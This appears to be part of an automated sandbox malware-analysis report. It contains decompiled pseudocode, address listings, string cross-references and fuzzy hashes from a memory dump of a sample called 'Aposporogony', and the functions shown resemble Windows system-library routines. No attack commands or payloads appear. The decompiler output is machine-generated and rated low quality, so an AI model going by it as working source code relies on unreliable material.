                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L53:
                                                                                                                                                                                      			}





























                                                                                                                                                                                      0x1d874b79
                                                                                                                                                                                      0x1d874b86
                                                                                                                                                                                      0x1d874b88
                                                                                                                                                                                      0x1d874b8e
                                                                                                                                                                                      0x1d874b90
                                                                                                                                                                                      0x1d874b93
                                                                                                                                                                                      0x1d874b97
                                                                                                                                                                                      0x1d874c27
                                                                                                                                                                                      0x1d874c35
                                                                                                                                                                                      0x1d874ba7
                                                                                                                                                                                      0x1d874ba7
                                                                                                                                                                                      0x1d874baa
                                                                                                                                                                                      0x1d874bac
                                                                                                                                                                                      0x1d874bb2
                                                                                                                                                                                      0x1d874bb5
                                                                                                                                                                                      0x1d874bbc
                                                                                                                                                                                      0x1d8b330f
                                                                                                                                                                                      0x1d8b3316
                                                                                                                                                                                      0x1d8b3317
                                                                                                                                                                                      0x1d8b331e
                                                                                                                                                                                      0x1d8b3321
                                                                                                                                                                                      0x1d8b3324
                                                                                                                                                                                      0x1d8b3327
                                                                                                                                                                                      0x1d8b332a
                                                                                                                                                                                      0x1d8b3331
                                                                                                                                                                                      0x1d8b3334
                                                                                                                                                                                      0x1d8b3339
                                                                                                                                                                                      0x1d8b333e
                                                                                                                                                                                      0x1d8b333e
                                                                                                                                                                                      0x1d874bca
                                                                                                                                                                                      0x1d8b3344
                                                                                                                                                                                      0x1d8b334b
                                                                                                                                                                                      0x1d8b334c
                                                                                                                                                                                      0x1d8b3353
                                                                                                                                                                                      0x1d8b3356
                                                                                                                                                                                      0x1d8b335d
                                                                                                                                                                                      0x1d8b3360
                                                                                                                                                                                      0x1d8b3363
                                                                                                                                                                                      0x1d8b336a
                                                                                                                                                                                      0x1d8b336d
                                                                                                                                                                                      0x1d8b3372
                                                                                                                                                                                      0x1d8b3372
                                                                                                                                                                                      0x1d874bd0
                                                                                                                                                                                      0x1d874bd5
                                                                                                                                                                                      0x1d874c36
                                                                                                                                                                                      0x1d874c36
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d874bd7
                                                                                                                                                                                      0x1d874bd7
                                                                                                                                                                                      0x1d874bdf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d874be1
                                                                                                                                                                                      0x1d874be3
                                                                                                                                                                                      0x1d874bec
                                                                                                                                                                                      0x1d874bef
                                                                                                                                                                                      0x1d874bf0
                                                                                                                                                                                      0x1d874bf9
                                                                                                                                                                                      0x1d874bfd
                                                                                                                                                                                      0x1d874bff
                                                                                                                                                                                      0x1d874c04
                                                                                                                                                                                      0x1d874c06
                                                                                                                                                                                      0x1d874c07
                                                                                                                                                                                      0x1d874c0a
                                                                                                                                                                                      0x1d874c0c
                                                                                                                                                                                      0x1d874c0f
                                                                                                                                                                                      0x1d874c1a
                                                                                                                                                                                      0x1d874c1c
                                                                                                                                                                                      0x1d874c21
                                                                                                                                                                                      0x1d8b337a
                                                                                                                                                                                      0x1d8b337a
                                                                                                                                                                                      0x1d8b337d
                                                                                                                                                                                      0x1d8b337d
                                                                                                                                                                                      0x1d8b3384
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b3386
                                                                                                                                                                                      0x1d8b3386
                                                                                                                                                                                      0x1d8b338b
                                                                                                                                                                                      0x1d8b33b2
                                                                                                                                                                                      0x1d8b33b5
                                                                                                                                                                                      0x1d8b33b9
                                                                                                                                                                                      0x1d8b33be
                                                                                                                                                                                      0x1d8b33f7
                                                                                                                                                                                      0x1d8b33f7
                                                                                                                                                                                      0x1d874c76
                                                                                                                                                                                      0x1d874c84
                                                                                                                                                                                      0x1d874c8c
                                                                                                                                                                                      0x1d874c90
                                                                                                                                                                                      0x1d874ca9
                                                                                                                                                                                      0x1d874ca9
                                                                                                                                                                                      0x1d874cae
                                                                                                                                                                                      0x1d874ce4
                                                                                                                                                                                      0x1d874cee
                                                                                                                                                                                      0x1d874cf3
                                                                                                                                                                                      0x1d874cf3
                                                                                                                                                                                      0x1d874ce6
                                                                                                                                                                                      0x1d874ce6
                                                                                                                                                                                      0x1d874cb2
                                                                                                                                                                                      0x1d8b3463
                                                                                                                                                                                      0x1d8b347b
                                                                                                                                                                                      0x1d8b3480
                                                                                                                                                                                      0x1d8b348a
                                                                                                                                                                                      0x1d8b3490
                                                                                                                                                                                      0x1d8b3490
                                                                                                                                                                                      0x1d8b348a
                                                                                                                                                                                      0x1d874cbe
                                                                                                                                                                                      0x1d874c92
                                                                                                                                                                                      0x1d874c98
                                                                                                                                                                                      0x1d874cc5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b3423
                                                                                                                                                                                      0x1d8b3429
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b342f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b342f
                                                                                                                                                                                      0x1d8b3429
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d874c9a
                                                                                                                                                                                      0x1d874c9a
                                                                                                                                                                                      0x1d874ca1
                                                                                                                                                                                      0x1d8b3434
                                                                                                                                                                                      0x1d8b3435
                                                                                                                                                                                      0x1d8b344f
                                                                                                                                                                                      0x1d8b3454
                                                                                                                                                                                      0x1d8b3454
                                                                                                                                                                                      0x1d874ca7
                                                                                                                                                                                      0x1d874ca7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d874c98
                                                                                                                                                                                      0x1d8b3391
                                                                                                                                                                                      0x1d8b3398
                                                                                                                                                                                      0x1d8b339c
                                                                                                                                                                                      0x1d8b33a2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b33a2
                                                                                                                                                                                      0x1d8b338b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b33a7
                                                                                                                                                                                      0x1d8b33a7
                                                                                                                                                                                      0x1d8b33a9
                                                                                                                                                                                      0x1d8b33ad
                                                                                                                                                                                      0x1d874c21
                                                                                                                                                                                      0x1d874c1a
                                                                                                                                                                                      0x1d874c04
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d874bfd
                                                                                                                                                                                      0x1d874bdf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d874bd5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d874bac
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                                                      • Opcode ID: 490d1d98402db282d196b954e80cd257535b6fda3e926986a20049cea36c6e3d
                                                                                                                                                                                      • Instruction ID: 61fcc14e8d14571220a72d91f64a76685ae86f5fb237598d357dd166bee476b3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 490d1d98402db282d196b954e80cd257535b6fda3e926986a20049cea36c6e3d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 23518AB1A00299EFCB15CF9CC4847A9FBF4EF84714F15802AE0499B250E7B09981CB82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 66%
                                                                                                                                                                                      			E1D840485(intOrPtr* __ecx) {
                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                      				char _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                      				char _t50;
                                                                                                                                                                                      				intOrPtr* _t51;
                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                      				char _t84;
                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                      				intOrPtr _t86;
                                                                                                                                                                                      				intOrPtr* _t89;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t89 = __ecx;
                                                                                                                                                                                      				_t76 =  *[fs:0x30];
                                                                                                                                                                                      				_t73 =  *0x1d936630; // 0x0
                                                                                                                                                                                      				_v32 = 0;
                                                                                                                                                                                      				_v28 = 0;
                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                      				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
                                                                                                                                                                                      				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
                                                                                                                                                                                      				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
                                                                                                                                                                                      				_v12 = _t76;
                                                                                                                                                                                      				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
                                                                                                                                                                                      				_t84 = 0;
                                                                                                                                                                                      				if(_t73 == 0) {
                                                                                                                                                                                      					_t73 = E1D8482E0(0xabababab, 0, "kLsE", 0);
                                                                                                                                                                                      					 *0x1d936630 = _t73;
                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					_t85 = _t84 - 1;
                                                                                                                                                                                      					if(_t85 == 0) {
                                                                                                                                                                                      						 *((intOrPtr*)(_t89 + 8)) = 2;
                                                                                                                                                                                      						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
                                                                                                                                                                                      						L19:
                                                                                                                                                                                      						 *((intOrPtr*)(_t89 + 4)) = 6;
                                                                                                                                                                                      						L6:
                                                                                                                                                                                      						_t86 = _v12;
                                                                                                                                                                                      						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
                                                                                                                                                                                      						if(_t51 == 0 ||  *_t51 == 0) {
                                                                                                                                                                                      							L8:
                                                                                                                                                                                      							 *((short*)(_t89 + 0x14)) = 0;
                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t38 = _t89 + 0x14; // 0x130
                                                                                                                                                                                      							if(E1D865C3F(_t38, 0x100, _t51) >= 0) {
                                                                                                                                                                                      								L9:
                                                                                                                                                                                      								if( *_t89 != 0x11c) {
                                                                                                                                                                                      									if( *_t89 != 0x124) {
                                                                                                                                                                                      										L16:
                                                                                                                                                                                      										return 0;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
                                                                                                                                                                                      								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
                                                                                                                                                                                      								 *(_t89 + 0x118) = E1D840670();
                                                                                                                                                                                      								if( *_t89 == 0x124) {
                                                                                                                                                                                      									 *(_t89 + 0x11c) = E1D840670() & 0x0001ffff;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *((char*)(_t89 + 0x11a)) = 0;
                                                                                                                                                                                      								if(E1D840630( &_v16) != 0) {
                                                                                                                                                                                      									 *((char*)(_t89 + 0x11a)) = _v16;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E1D885050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
                                                                                                                                                                                      								_push( &_v24);
                                                                                                                                                                                      								_push(4);
                                                                                                                                                                                      								_push( &_v8);
                                                                                                                                                                                      								_push( &_v20);
                                                                                                                                                                                      								_push( &_v32);
                                                                                                                                                                                      								if(E1D883EE0() >= 0) {
                                                                                                                                                                                      									if(_v8 == 1) {
                                                                                                                                                                                      										if(_v20 != 4 || _v24 != 4) {
                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L15:
                                                                                                                                                                                      									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
                                                                                                                                                                                      									if( *_t89 == 0x124) {
                                                                                                                                                                                      										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L16;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t85 == 1) {
                                                                                                                                                                                      						 *((intOrPtr*)(_t89 + 8)) = 3;
                                                                                                                                                                                      						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
                                                                                                                                                                                      						goto L19;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L1:
                                                                                                                                                                                      				if(_t73 != E1D840690) {
                                                                                                                                                                                      					 *0x1d9391e0();
                                                                                                                                                                                      					_t50 =  *_t73();
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t50 = E1D840690();
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t84 = _t50;
                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                      			}


















                                                                                                                                                                                      0x1d84048f
                                                                                                                                                                                      0x1d840493
                                                                                                                                                                                      0x1d84049a
                                                                                                                                                                                      0x1d8404a0
                                                                                                                                                                                      0x1d8404a3
                                                                                                                                                                                      0x1d8404a6
                                                                                                                                                                                      0x1d8404af
                                                                                                                                                                                      0x1d8404b8
                                                                                                                                                                                      0x1d8404c2
                                                                                                                                                                                      0x1d8404cb
                                                                                                                                                                                      0x1d8404ce
                                                                                                                                                                                      0x1d8404d2
                                                                                                                                                                                      0x1d8404d6
                                                                                                                                                                                      0x1d84060e
                                                                                                                                                                                      0x1d840610
                                                                                                                                                                                      0x1d840618
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8404ef
                                                                                                                                                                                      0x1d8404ef
                                                                                                                                                                                      0x1d8404f2
                                                                                                                                                                                      0x1d8405e3
                                                                                                                                                                                      0x1d8405ea
                                                                                                                                                                                      0x1d8405f1
                                                                                                                                                                                      0x1d8405f1
                                                                                                                                                                                      0x1d840501
                                                                                                                                                                                      0x1d840501
                                                                                                                                                                                      0x1d840504
                                                                                                                                                                                      0x1d84050c
                                                                                                                                                                                      0x1d840519
                                                                                                                                                                                      0x1d84051b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89e99c
                                                                                                                                                                                      0x1d89e9a2
                                                                                                                                                                                      0x1d89e9ac
                                                                                                                                                                                      0x1d84051f
                                                                                                                                                                                      0x1d84052a
                                                                                                                                                                                      0x1d89e9b9
                                                                                                                                                                                      0x1d8405cd
                                                                                                                                                                                      0x1d8405d3
                                                                                                                                                                                      0x1d8405d3
                                                                                                                                                                                      0x1d89e9bf
                                                                                                                                                                                      0x1d84053c
                                                                                                                                                                                      0x1d84054d
                                                                                                                                                                                      0x1d840559
                                                                                                                                                                                      0x1d840562
                                                                                                                                                                                      0x1d89e9ce
                                                                                                                                                                                      0x1d89e9ce
                                                                                                                                                                                      0x1d84056a
                                                                                                                                                                                      0x1d84057b
                                                                                                                                                                                      0x1d840580
                                                                                                                                                                                      0x1d840580
                                                                                                                                                                                      0x1d84058f
                                                                                                                                                                                      0x1d840597
                                                                                                                                                                                      0x1d840598
                                                                                                                                                                                      0x1d84059d
                                                                                                                                                                                      0x1d8405a1
                                                                                                                                                                                      0x1d8405a5
                                                                                                                                                                                      0x1d8405ad
                                                                                                                                                                                      0x1d8405b3
                                                                                                                                                                                      0x1d89e9dd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89e9ed
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89e9ed
                                                                                                                                                                                      0x1d89e9dd
                                                                                                                                                                                      0x1d8405b9
                                                                                                                                                                                      0x1d8405be
                                                                                                                                                                                      0x1d8405c7
                                                                                                                                                                                      0x1d89e9f2
                                                                                                                                                                                      0x1d89e9f2
                                                                                                                                                                                      0x1d8405c7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8405ad
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89e9b2
                                                                                                                                                                                      0x1d84050c
                                                                                                                                                                                      0x1d8404fb
                                                                                                                                                                                      0x1d89e989
                                                                                                                                                                                      0x1d89e990
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89e990
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8404fb
                                                                                                                                                                                      0x1d8404dc
                                                                                                                                                                                      0x1d8404e2
                                                                                                                                                                                      0x1d8405d6
                                                                                                                                                                                      0x1d8405dc
                                                                                                                                                                                      0x1d8404e8
                                                                                                                                                                                      0x1d8404e8
                                                                                                                                                                                      0x1d8404e8
                                                                                                                                                                                      0x1d8404ed
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D840586
                                                                                                                                                                                      • kLsE, xrefs: 1D8405FE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                                                      • Opcode ID: f7924d7148d2cec6b10eba1bec1b6b61af3dfede1b446dfdc6eb117087b9db6e
                                                                                                                                                                                      • Instruction ID: 6375a7daad957bdbe618efd7ff92337c275b05bdeebb8de17267c2a40a1ca269
                                                                                                                                                                                      • Opcode Fuzzy Hash: f7924d7148d2cec6b10eba1bec1b6b61af3dfede1b446dfdc6eb117087b9db6e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0651AB71A0475A9EC715DFA4C4407ABB7F4AF44304F21C42EE69A97241E734A506CBA3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                                                      			E1D83DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				char _v60;
                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				intOrPtr _t48;
                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                      				intOrPtr* _t52;
                                                                                                                                                                                      				char _t56;
                                                                                                                                                                                      				void* _t69;
                                                                                                                                                                                      				char _t72;
                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                      				intOrPtr _t75;
                                                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                      				void* _t84;
                                                                                                                                                                                      				intOrPtr _t86;
                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                      				signed int _t90;
                                                                                                                                                                                      				signed int _t92;
                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t80 = __edx;
                                                                                                                                                                                      				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                                                                                                                                                                                      				_v8 =  *0x1d93b370 ^ _t92;
                                                                                                                                                                                      				_t72 = 0;
                                                                                                                                                                                      				_v72 = __edx;
                                                                                                                                                                                      				_t82 = __ecx;
                                                                                                                                                                                      				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                                                                                                      				_v68 = _t86;
                                                                                                                                                                                      				E1D888F40( &_v60, 0, 0x30);
                                                                                                                                                                                      				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                                                                                                                                                                                      				_t93 = _t92 + 0xc;
                                                                                                                                                                                      				_v76 = _t48;
                                                                                                                                                                                      				_t49 = _t48;
                                                                                                                                                                                      				if(_t49 == 0) {
                                                                                                                                                                                      					_push(5);
                                                                                                                                                                                      					 *((char*)(_t82 + 0x6a)) = 0;
                                                                                                                                                                                      					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t69 = _t49 - 1;
                                                                                                                                                                                      					if(_t69 != 0) {
                                                                                                                                                                                      						if(_t69 == 1) {
                                                                                                                                                                                      							_push(0xa);
                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t56 = 0;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_push(4);
                                                                                                                                                                                      						L3:
                                                                                                                                                                                      						_pop(_t50);
                                                                                                                                                                                      						_v80 = _t50;
                                                                                                                                                                                      						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                                                                                                                                                                                      							L1D852330(_t50, _t86 + 0x1c);
                                                                                                                                                                                      							_t79 = _v72;
                                                                                                                                                                                      							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                      							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                                                                                                                                                                                      							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                                                                                                                                                                                      							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                                                                                                                                                                                      							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                                                                                                                                                                                      							E1D8524D0(_t86 + 0x1c);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t75 = _v80;
                                                                                                                                                                                      						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                                                                                                                                                                                      						_t80 =  *_t52;
                                                                                                                                                                                      						_v72 =  *((intOrPtr*)(_t52 + 4));
                                                                                                                                                                                      						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                                                                                                                                                                                      						_v60 = 0x30;
                                                                                                                                                                                      						_v56 = _t75;
                                                                                                                                                                                      						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                                                                                                                                                                                      						asm("movsd");
                                                                                                                                                                                      						_v76 = _t80;
                                                                                                                                                                                      						_v64 = 0x30;
                                                                                                                                                                                      						asm("movsd");
                                                                                                                                                                                      						asm("movsd");
                                                                                                                                                                                      						asm("movsd");
                                                                                                                                                                                      						if(_t80 != 0) {
                                                                                                                                                                                      							 *0x1d9391e0(_t75, _v72,  &_v64,  &_v60);
                                                                                                                                                                                      							_t72 = _v76();
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t56 = _t72;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_pop(_t84);
                                                                                                                                                                                      				_pop(_t88);
                                                                                                                                                                                      				_pop(_t73);
                                                                                                                                                                                      				return E1D884B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                                                                                                                                                                                      			}


































                                                                                                                                                                                      0x1d83df21
                                                                                                                                                                                      0x1d83df29
                                                                                                                                                                                      0x1d83df33
                                                                                                                                                                                      0x1d83df3b
                                                                                                                                                                                      0x1d83df40
                                                                                                                                                                                      0x1d83df44
                                                                                                                                                                                      0x1d83df46
                                                                                                                                                                                      0x1d83df52
                                                                                                                                                                                      0x1d83df56
                                                                                                                                                                                      0x1d83df5b
                                                                                                                                                                                      0x1d83df5e
                                                                                                                                                                                      0x1d83df61
                                                                                                                                                                                      0x1d83df65
                                                                                                                                                                                      0x1d83df67
                                                                                                                                                                                      0x1d83e058
                                                                                                                                                                                      0x1d83e05a
                                                                                                                                                                                      0x1d83e05d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d83df6d
                                                                                                                                                                                      0x1d83df6d
                                                                                                                                                                                      0x1d83df70
                                                                                                                                                                                      0x1d89d6ea
                                                                                                                                                                                      0x1d89d6f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d89d6ec
                                                                                                                                                                                      0x1d89d6ec
                                                                                                                                                                                      0x1d89d6ec
                                                                                                                                                                                      0x1d83df76
                                                                                                                                                                                      0x1d83df76
                                                                                                                                                                                      0x1d83df78
                                                                                                                                                                                      0x1d83df78
                                                                                                                                                                                      0x1d83df79
                                                                                                                                                                                      0x1d83df80
                                                                                                                                                                                      0x1d83e019
                                                                                                                                                                                      0x1d83e024
                                                                                                                                                                                      0x1d83e02c
                                                                                                                                                                                      0x1d83e032
                                                                                                                                                                                      0x1d83e03b
                                                                                                                                                                                      0x1d83e045
                                                                                                                                                                                      0x1d83e04b
                                                                                                                                                                                      0x1d83e04e
                                                                                                                                                                                      0x1d83e04e
                                                                                                                                                                                      0x1d83df8d
                                                                                                                                                                                      0x1d83df91
                                                                                                                                                                                      0x1d83df94
                                                                                                                                                                                      0x1d83df99
                                                                                                                                                                                      0x1d83dfa0
                                                                                                                                                                                      0x1d83dfab
                                                                                                                                                                                      0x1d83dfb3
                                                                                                                                                                                      0x1d83dfb7
                                                                                                                                                                                      0x1d83dfbb
                                                                                                                                                                                      0x1d83dfbc
                                                                                                                                                                                      0x1d83dfc0
                                                                                                                                                                                      0x1d83dfc8
                                                                                                                                                                                      0x1d83dfc9
                                                                                                                                                                                      0x1d83dfca
                                                                                                                                                                                      0x1d83dfcd
                                                                                                                                                                                      0x1d83dfe0
                                                                                                                                                                                      0x1d83dfea
                                                                                                                                                                                      0x1d83dfea
                                                                                                                                                                                      0x1d83dfec
                                                                                                                                                                                      0x1d83dfec
                                                                                                                                                                                      0x1d83df70
                                                                                                                                                                                      0x1d83dff2
                                                                                                                                                                                      0x1d83dff3
                                                                                                                                                                                      0x1d83dff4
                                                                                                                                                                                      0x1d83dfff

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: 0$0
                                                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                                                      • Opcode ID: ea6e61b314ab8e76401bac9eaa7efe6d9a38edbf48f79a8d9ea161ccaf68bccf
                                                                                                                                                                                      • Instruction ID: bf3dd64a4bf91a3fe56410f2372aa00a247f51454b59f665fcc95b8469159372
                                                                                                                                                                                      • Opcode Fuzzy Hash: ea6e61b314ab8e76401bac9eaa7efe6d9a38edbf48f79a8d9ea161ccaf68bccf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 994159B1608746AFC301CF2CC484A5ABBE4FB88714F008A6EF58CDB241D771EA05CB96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:3.7%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                                                                                      Signature Coverage:0.9%
                                                                                                                                                                                      Total number of Nodes:1269
                                                                                                                                                                                      Total number of Limit Nodes:142
